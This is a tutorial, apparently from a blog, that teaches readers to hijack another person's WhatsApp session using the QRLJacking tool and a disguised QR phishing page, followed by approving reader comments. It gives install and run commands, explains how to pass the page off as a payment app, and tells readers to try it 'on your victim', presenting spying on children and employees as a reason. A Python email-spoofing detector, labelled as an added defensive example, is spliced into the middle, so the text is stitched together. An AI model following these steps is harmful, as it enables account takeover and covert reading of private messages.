WhatsApp Hacking! Social Engineering Example
What is Hacking?
A security hacker is someone who explores methods for breaching defenses and exploiting weaknesses in a computer system or network. In short, exploiting a weakness in a computer system or its security can be referred to as hacking.
Why Do You Need to Hack Someone’s WhatsApp?
Monitoring WhatsApp activity enables you to learn the truth about someone. If you are a parent, you can check whether your children are safe. In addition, you can check whether they are being bullied or keeping in touch with strangers. If you are an employer who thinks your employees are selling company secrets, you can monitor their WhatsApp to find the truth.
1. Protect Your Children
Kids often use WhatsApp to chat with netizens, and you cannot be sure whether these netizens will be harmful to your kids. So you need to hack WhatsApp to check your children's chat history and make sure your children are not in danger.
2. Monitor Your Employees
Some employees use social apps to chat with family or friends during work hours. As an employer, you need to ensure the efficiency of your employees. Hacking employees' chat messages on social apps like WhatsApp lets you find out whether employees are lazy or have revealed company secrets.
Top 10 most common types of cyber attacks are:
- Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks
- Man-in-the-middle (MitM) attack
- Phishing and spear phishing attacks
- Drive-by attack
- Password attack
- SQL injection attack
- Cross-site scripting (XSS) attack
- Eavesdropping attack
- Birthday attack
- Malware attack
What is Phishing:
Phishing is the fraudulent attempt to obtain sensitive information or data, such as usernames, passwords and credit card details, by disguising oneself as a trustworthy entity in an electronic communication.
Typically carried out by email spoofing, instant messaging and text messaging, phishing often directs users to enter personal information at a fake website which matches the look and feel of the legitimate site.
Is WhatsApp Hacking possible?
Yes, it is possible.
How can WhatsApp be Hacked?
Using social engineering.
Social engineering is the psychological manipulation of people into performing actions or divulging confidential information.
Example of social engineering:
Consider this example of spear phishing that convinced an employee to transfer $500,000 to a foreign investor:
- Thanks to careful spear phishing research, the cybercriminal knows the company CEO is traveling.
- An email is sent to a company employee that looks like it came from the CEO. There is a slight discrepancy in the email address – but the spelling of the CEO’s name is correct.
- In the email, the employee is asked to help the CEO out by transferring $500,000 to a new foreign investor. The email uses urgent yet friendly language, convincing the employee that he will be helping both the CEO and the company.
- The email stresses that the CEO would do this transfer herself but since she is travelling, she can’t make the fund transfer in time to secure the foreign investment partnership.
- Without verifying the details, the employee decides to act. He truly believes that he is helping the CEO, the company, and his colleagues by complying with the email request.
- A few days later, the victimized employee, CEO, and company colleagues realize they have been victims of a social engineering attack and have lost $500,000.
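The warning sign in this example (a correct CEO name on a slightly wrong address, plus an urgent payment request) can be checked for at the mail gateway. The following is an added defensive example, not part of the original post; the executive directory, domains and sample messages are constructed for illustration.

```python
from email.utils import parseaddr

# Constructed directory: display names attackers impersonate -> real address.
EXECUTIVES = {"jane doe": "jane.doe@example.com"}
TRUSTED_DOMAINS = {"example.com"}
PAYMENT_WORDS = ("transfer", "wire", "payment", "invoice", "urgent")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to spot near-miss domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess(from_header: str, subject: str, body: str) -> list[str]:
    """Return the reasons a message should be held for out-of-band verification."""
    reasons = []
    name, addr = parseaddr(from_header)
    name, addr = " ".join(name.lower().split()), addr.lower()
    domain = addr.rpartition("@")[2]
    real = EXECUTIVES.get(name)
    if real and addr != real:
        reasons.append("display name matches an executive but address differs")
    if domain not in TRUSTED_DOMAINS and any(
        0 < edit_distance(domain, t) <= 2 for t in TRUSTED_DOMAINS
    ):
        reasons.append(f"look-alike sender domain: {domain}")
    text = f"{subject} {body}".lower()
    if reasons and any(w in text for w in PAYMENT_WORDS):
        reasons.append("payment or urgency language from an unverified sender")
    return reasons


# Constructed sample messages.
SPOOFED = ("Jane Doe <jane.doe@examp1e.com>", "Urgent favour",
           "Please transfer $500,000 to the new investor today.")
GENUINE = ("Jane Doe <jane.doe@example.com>", "Board deck", "Slides attached.")

if __name__ == "__main__":
    for msg in (SPOOFED, GENUINE):
        print(msg[0], "->", assess(*msg) or "no findings")
```

A message that returns any reason should be confirmed with the purported sender over a separate, already-known channel before money moves.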
Technique to hack WhatsApp:
We will use the QRLJacking tool.
QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of session hijacking affecting all applications that rely on the “Login with QR code” feature as a secure way to login into accounts. In a nutshell, the victim scans the attacker’s QR code which results in session hijacking.
Pre-requisites:
- Any Linux Distribution such as Ubuntu, Kali, Fedora, etc
- Python 3.7
Steps to hack WhatsApp:
Open a terminal in Linux.
Install the latest geckodriver from https://github.com/mozilla/geckodriver/releases and extract the file, then do:
- chmod +x geckodriver
- sudo mv -f geckodriver /usr/local/share/geckodriver
- sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
- sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
Now type in the terminal:
- git clone https://github.com/OWASP/QRLJacking.git
- cd QRLJacking/QRLJacker
- pip install -r requirements.txt
- python3 QrlJacker.py --help
- python3 QrlJacker.py (run the Python file)
1. A new terminal window now appears; type:
- use grabber/whatsapp
- set port 1337 (set to the default port, i.e. 1337)
- run (wait a few minutes; this process takes time)
2. Open your browser and type in your search bar:
0.0.0.0:1337
A page with a QR code appears.
The victim should scan the QR code.
Note: You can change the page design to another page you want using QRLJacking\QRLJacker\core\templates\phishing_page.html
3. Once the victim scans the QR code, type:
- sessions (this will list the sessions you are connected to)
- sessions -i 0 (this will open the victim's WhatsApp in the browser)
To terminate (log out from) the sessions, type in the terminal:
jobs -K (log out from WhatsApp)
You can convert the phishing_page.html to any other page such as a Paytm scanning code or a PhonePe scanning code. Just convince the victim to scan the QR code.
Note: This post is only for educational purposes. Not everything will be spoon-fed; try to apply it on your own on your victim.
Thanks for reading, and give it a try.
Comment below on how the tutorial was and whether I should continue this type of post.
Great 👍
Thank you
Awesome, brother
Thank you
Bro, this is so easy and I have already tried it also and I know the better ways to hack WhatsApp and this method can only give you a chance to open the victim's WhatsApp for five minutes or for as long as the victim's internet is on, OK
It would be great if you would like to share the other ways to hack WhatsApp.... Thank you
Wow, Shantnu bhaiya, that's amazing